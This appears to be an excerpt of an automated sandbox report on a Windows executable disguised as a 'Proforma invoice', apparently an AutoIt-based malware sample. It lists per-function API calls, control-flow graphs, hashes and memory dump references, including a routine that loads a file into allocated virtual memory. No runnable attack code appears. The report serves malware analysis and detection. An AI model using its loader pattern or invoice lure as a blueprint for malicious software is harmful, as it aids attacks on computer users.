                                                                                                                    • timeGetTime.WINMM ref: 00260D16
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260E53
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00260E61
                                                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00260EFA
                                                                                                                    • DestroyWindow.USER32 ref: 00260F06
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00260F20
                                                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00294E83
                                                                                                                    • TranslateMessage.USER32(?), ref: 00295C60
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00295C6E
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00295C82
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb1$pb1$pb1$pb1
                                                                                                                    • API String ID: 4212290369-2471073435
                                                                                                                    • Opcode ID: 6a2dba371456e567dc05cedb5abbb712955c0ac08f8815636dd92b67d1d20821
                                                                                                                    • Instruction ID: 588014f2505952ae507c2d7bd650f5bda9966b3baffacf8ffaef8d2ee7334c31
                                                                                                                    • Opcode Fuzzy Hash: 6a2dba371456e567dc05cedb5abbb712955c0ac08f8815636dd92b67d1d20821
                                                                                                                    • Instruction Fuzzy Hash: CDB2F670628752DFDB25DF24C885BABB7E4BF84304F14491DE94A97291CB70E8A4DF82
                                                                                                                    Function 002B9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B8F5F: __time64.LIBCMT ref: 002B8F69
                                                                                                                      • Part of subcall function 00254EE5: _fseek.LIBCMT ref: 00254EFD
                                                                                                                    • __wsplitpath.LIBCMT ref: 002B9234
                                                                                                                      • Part of subcall function 002740FB: __wsplitpath_helper.LIBCMT ref: 0027413B
                                                                                                                    • _wcscpy.LIBCMT ref: 002B9247
                                                                                                                    • _wcscat.LIBCMT ref: 002B925A
                                                                                                                    • __wsplitpath.LIBCMT ref: 002B927F
                                                                                                                    • _wcscat.LIBCMT ref: 002B9295
                                                                                                                    • _wcscat.LIBCMT ref: 002B92A8
                                                                                                                      • Part of subcall function 002B8FA5: _memmove.LIBCMT ref: 002B8FDE
                                                                                                                      • Part of subcall function 002B8FA5: _memmove.LIBCMT ref: 002B8FED
                                                                                                                    • _wcscmp.LIBCMT ref: 002B91EF
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9824
                                                                                                                      • Part of subcall function 002B9734: _wcscmp.LIBCMT ref: 002B9837
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B9452
                                                                                                                    • _wcsncpy.LIBCMT ref: 002B94C5
                                                                                                                    • DeleteFileW.KERNEL32(?,?), ref: 002B94FB
                                                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002B9511
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9522
                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002B9534
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1500180987-0
                                                                                                                    • Opcode ID: 113b40590a216e0d566a77e08187d1efa5b6dc875ab22fe99b71d415d1dd12f0
                                                                                                                    • Instruction ID: 0765c8b2ae04e6575d0250e33e7d921c30b4b0be412d9d7b6f1269546871a2f7
                                                                                                                    • Opcode Fuzzy Hash: 113b40590a216e0d566a77e08187d1efa5b6dc875ab22fe99b71d415d1dd12f0
                                                                                                                    • Instruction Fuzzy Hash: 0BC15CB1D10219AACF21DFA4CC85AEEB7BCEF45340F0040AAF609E6141EB309A94CF65
                                                                                                                    Function 0025301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00253074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0025309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002530CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 002530F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: 4ecd207570390b65ff0150c2f5128f1f8966d0ed5c929ab62868bcbae033e1d8
                                                                                                                    • Instruction ID: 1d1475371b4b99fad3009153af2829507d09de7c005399f53393d1387765acbd
                                                                                                                    • Opcode Fuzzy Hash: 4ecd207570390b65ff0150c2f5128f1f8966d0ed5c929ab62868bcbae033e1d8
                                                                                                                    • Instruction Fuzzy Hash: F73125B1D51309EFDB41CFA4E989ADDBBF4FB09310F14812AE581E62A0E3B50995CF94
                                                                                                                    Function 00253041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00253074
                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 0025309E
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002530CC
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
                                                                                                                    • LoadIconW.USER32(000000A9), ref: 002530F2
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                    • Opcode ID: 984ac3025875dd25feac85a7e5c9013fd3a9ce666835817213392e12bd62bae7
                                                                                                                    • Instruction ID: dd767c4c6a9e6f998bb14d1d45b0e7ea6628b964d4d009b1efc6574edd323447
                                                                                                                    • Opcode Fuzzy Hash: 984ac3025875dd25feac85a7e5c9013fd3a9ce666835817213392e12bd62bae7
                                                                                                                    • Instruction Fuzzy Hash: 1F21E4B1E11318EFDB41DFA4E948BDDBBF8FB08701F00812AF911A62A0D7B149448F95
                                                                                                                    Function 0025708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003152F8,?,002537AE,?), ref: 00254724
                                                                                                                      • Part of subcall function 0027050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00257165), ref: 0027052D
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002571A8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0028E8C8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0028E909
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0028E947
                                                                                                                    • _wcscat.LIBCMT ref: 0028E9A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                    • API String ID: 2673923337-2727554177
                                                                                                                    • Opcode ID: fca859c09ea165624e6c2a2b5d4077605b591788d1909e424647201f80b537c0
                                                                                                                    • Instruction ID: dcf5aec45d6f5d3c50c7172fa2dc13a1e0a64a42cc47f04866a3b4495c8c6d80
                                                                                                                    • Opcode Fuzzy Hash: fca859c09ea165624e6c2a2b5d4077605b591788d1909e424647201f80b537c0
                                                                                                                    • Instruction Fuzzy Hash: 4471BF715293019EC701EF65EC829ABBBECFF89350F40892EF845831A0DB719969CF56
                                                                                                                    Function 00253633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 760 253633-253681 762 2536e1-2536e3 760->762 763 253683-253686 760->763 762->763 764 2536e5 762->764 765 2536e7 763->765 766 253688-25368f 763->766 767 2536ca-2536d2 DefWindowProcW 764->767 768 28d0cc-28d0fa call 261070 call 261093 765->768 769 2536ed-2536f0 765->769 770 253695-25369a 766->770 771 25374b-253753 PostQuitMessage 766->771 775 2536d8-2536de 767->775 803 28d0ff-28d106 768->803 776 253715-25373c SetTimer RegisterWindowMessageW 769->776 777 2536f2-2536f3 769->777 772 2536a0-2536a2 770->772 773 28d154-28d168 call 2b2527 770->773 774 253711-253713 771->774 780 253755-253764 call 2544a0 772->780 781 2536a8-2536ad 772->781 773->774 797 28d16e 773->797 774->775 776->774 782 25373e-253749 CreatePopupMenu 776->782 784 28d06f-28d072 777->784 785 2536f9-25370c KillTimer call 25443a call 253114 777->785 780->774 787 28d139-28d140 781->787 788 2536b3-2536b8 781->788 782->774 791 28d0a8-28d0c7 MoveWindow 784->791 792 28d074-28d076 784->792 785->774 787->767 802 28d146-28d14f call 2a7c36 787->802 795 2536be-2536c4 788->795 796 28d124-28d134 call 2b2d36 788->796 791->774 799 28d078-28d07b 792->799 800 28d097-28d0a3 SetFocus 792->800 795->767 795->803 796->774 797->767 799->795 804 28d081-28d092 call 261070 799->804 800->774 802->767 803->767 809 28d10c-28d11f call 25443a call 25434a 803->809 804->774 809->767
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 002536D2
                                                                                                                    • KillTimer.USER32(?,00000001), ref: 002536FC
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0025371F
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0025372A
                                                                                                                    • CreatePopupMenu.USER32 ref: 0025373E
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0025374D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated$%.
                                                                                                                    • API String ID: 129472671-2498375929
                                                                                                                    • Opcode ID: e90a74b00f34e45c82eae8cebe23be96c396b3bc1d29bff68b4d45c615e9bae9
                                                                                                                    • Instruction ID: ccd9b41c50be9d05bc60da75f55283ced01d090ed2d0e748673aeeaa4f5cfd5b
                                                                                                                    • Opcode Fuzzy Hash: e90a74b00f34e45c82eae8cebe23be96c396b3bc1d29bff68b4d45c615e9bae9
                                                                                                                    • Instruction Fuzzy Hash: B2414876630506EBDB15AF64EC09BF97798EB48382F141429FD02822E1CAB09D79972D
                                                                                                                    Function 00253A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00253A50
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00253A5F
                                                                                                                    • LoadIconW.USER32(00000063), ref: 00253A76
                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00253A88
                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00253A9A
                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AC0
                                                                                                                    • RegisterClassExW.USER32(?), ref: 00253B16
                                                                                                                      • Part of subcall function 00253041: GetSysColorBrush.USER32(0000000F), ref: 00253074
                                                                                                                      • Part of subcall function 00253041: RegisterClassExW.USER32(00000030), ref: 0025309E
                                                                                                                      • Part of subcall function 00253041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002530AF
                                                                                                                      • Part of subcall function 00253041: InitCommonControlsEx.COMCTL32(?), ref: 002530CC
                                                                                                                      • Part of subcall function 00253041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002530DC
                                                                                                                      • Part of subcall function 00253041: LoadIconW.USER32(000000A9), ref: 002530F2
                                                                                                                      • Part of subcall function 00253041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00253101
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                    • Opcode ID: 04c250dcfa9cbe11fff4da8e9b41828b702cd821da03b2fbd58cc22a2f613498
                                                                                                                    • Instruction ID: 908512b8c2428dc11aedf9b915db45b617cead640178d12143ccbab4c76231f2
                                                                                                                    • Opcode Fuzzy Hash: 04c250dcfa9cbe11fff4da8e9b41828b702cd821da03b2fbd58cc22a2f613498
                                                                                                                    • Instruction Fuzzy Hash: 1B213C72D11304EFEB12DFA4ED09BDD7BB8EB4C711F00851AF500A62A1D3B65A558F88
                                                                                                                    Function 00253766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R1
                                                                                                                    • API String ID: 1825951767-3288481718
                                                                                                                    • Opcode ID: a8be99c7fe1b66c0087ba163f41e94ccf671039affcbb20f9329a7af193115cc
                                                                                                                    • Instruction ID: ee47cf20cb91dda4a313464fcf6954623b1171cd3d2e2ec2758cd0dfd8d2f6cb
                                                                                                                    • Opcode Fuzzy Hash: a8be99c7fe1b66c0087ba163f41e94ccf671039affcbb20f9329a7af193115cc
                                                                                                                    • Instruction Fuzzy Hash: 75A17F7292022DDACB05EBA0DC56AEEB778BF15341F40042AF816B7191DF745A2DCFA4
                                                                                                                    Function 0025F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00270193
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0027019B
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002701A6
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 002701B1
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(00000011,00000000), ref: 002701B9
                                                                                                                      • Part of subcall function 00270162: MapVirtualKeyW.USER32(00000012,00000000), ref: 002701C1
                                                                                                                      • Part of subcall function 002660F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0025F930), ref: 00266154
                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0025F9CD
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0025FA4A
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002945C8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: <W1$\T1$%.$S1
                                                                                                                    • API String ID: 1986988660-287808681
                                                                                                                    • Opcode ID: d66eee8cfc9e2c0a3784afe1afb974d1d99f9cddc3f9800617858f9f67568fcb
                                                                                                                    • Instruction ID: db567bb9ecf8688808c77e944396fc053d8d7f8d5fe4ae21161e44e6ba317a09
                                                                                                                    • Opcode Fuzzy Hash: d66eee8cfc9e2c0a3784afe1afb974d1d99f9cddc3f9800617858f9f67568fcb
                                                                                                                    • Instruction Fuzzy Hash: 5081BBB4921A40CFD386DF2AE9856D87BEDFBDC306B90C52AD419CB2A1EB704494CF15
                                                                                                                    Function 00C524A8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 983 c524a8-c52556 call c4fec8 986 c5255d-c52583 call c533b8 CreateFileW 983->986 989 c52585 986->989 990 c5258a-c5259a 986->990 991 c526d5-c526d9 989->991 995 c525a1-c525bb VirtualAlloc 990->995 996 c5259c 990->996 993 c5271b-c5271e 991->993 994 c526db-c526df 991->994 997 c52721-c52728 993->997 998 c526e1-c526e4 994->998 999 c526eb-c526ef 994->999 1002 c525c2-c525d9 ReadFile 995->1002 1003 c525bd 995->1003 996->991 1004 c5277d-c52792 997->1004 1005 c5272a-c52735 997->1005 998->999 1000 c526f1-c526fb 999->1000 1001 c526ff-c52703 999->1001 1000->1001 1008 c52705-c5270f 1001->1008 1009 c52713 1001->1009 1010 c525e0-c52620 VirtualAlloc 1002->1010 1011 c525db 1002->1011 1003->991 1006 c52794-c5279f VirtualFree 1004->1006 1007 c527a2-c527aa 1004->1007 1012 c52737 1005->1012 1013 c52739-c52745 1005->1013 1006->1007 1008->1009 1009->993 1014 c52627-c52642 call c53608 1010->1014 1015 c52622 1010->1015 1011->991 1012->1004 1016 c52747-c52757 1013->1016 1017 c52759-c52765 1013->1017 1023 c5264d-c52657 1014->1023 1015->991 1021 c5277b 1016->1021 1018 c52767-c52770 1017->1018 1019 c52772-c52778 1017->1019 1018->1021 1019->1021 1021->997 1024 c52659-c52688 call c53608 1023->1024 1025 c5268a-c5269e call c53418 1023->1025 1024->1023 1031 c526a0 1025->1031 1032 c526a2-c526a6 1025->1032 1031->991 1033 c526b2-c526b6 1032->1033 1034 c526a8-c526ac CloseHandle 1032->1034 1035 c526c6-c526cf 1033->1035 1036 c526b8-c526c3 VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C52579
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C5279F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013476899.0000000000C4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C4F000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_c4f000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 204039940-0
                                                                                                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                    • Instruction ID: 0b61edbc67c3c34842c69dcf07c73b9c4c206ebae01dd3dc985037c7bc09bd41
                                                                                                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                    • Instruction Fuzzy Hash: 8AA14B78E00208EBDB14CFA4C895BEEB7B5FF49305F208159E911BB280DB759A85CF58
                                                                                                                    Function 002539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1114 2539d5-253a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A03
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A24
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00253A38
                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00253A41
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
